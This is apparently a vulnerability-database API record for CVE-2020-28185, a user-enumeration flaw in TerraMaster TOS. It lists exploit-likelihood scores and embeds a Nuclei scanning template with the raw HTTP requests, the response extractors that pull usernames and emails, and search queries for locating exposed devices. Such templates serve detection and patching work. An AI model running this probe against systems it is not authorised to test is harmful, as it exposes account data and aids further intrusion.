{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-28185/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-28185/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-28185/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-28185/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-28185/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-28185"},"sightings":{"href":"/api/v1/sightings/cve-2020-28185"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.18253,"kev":false,"percentile":0.9709},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-28185.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2020-28185\n\ninfo:\n  name: TerraMaster TOS < 4.2.06 - User Enumeration\n  author: pussycat0x\n  severity: medium\n  description: |\n    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n  impact: |\n    An attacker can enumerate valid usernames, potentially aiding in further attacks.\n  remediation: |\n    Upgrade TerraMaster TOS to version 4.2.06 or later.\n  reference:\n    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185\n    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/\n    - https://www.terra-master.com/\n    - https://github.com/ArrestX/--POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2020-28185\n    epss-score: 0.18253\n    epss-percentile: 0.9709\n    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: terra-master\n    product: tos\n    fofa-query:\n      - '\"TerraMaster\" && header=\"TOS\"'\n      - '\"terramaster\" && header=\"tos\"'\n  tags: cve2020,cve,terramaster,enum,tos,terra-master,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /tos/index.php?user/login HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /wizard/initialise.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Requested-With: XMLHttpRequest\n        Referer: {{RootURL}}/tos/index.php?user/login\n\n        tab=checkuser&username=admin\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"username\":'\n          - '\"email\":'\n          - '\"status\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body_2\n        regex:\n          - '\"username\":\"(.*?)\"'\n          - '\"email\":\"(.*?)\"'\n# digest: 4b0a00483046022100eda94a43541d3175e6ff42c8ce072b6996d967c2ec66562bd21288407e924e47022100d0debf7b23dda164ffc7349a69d5722ac8b18167c2df1c818d46bfe18bd36da5:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-28185"}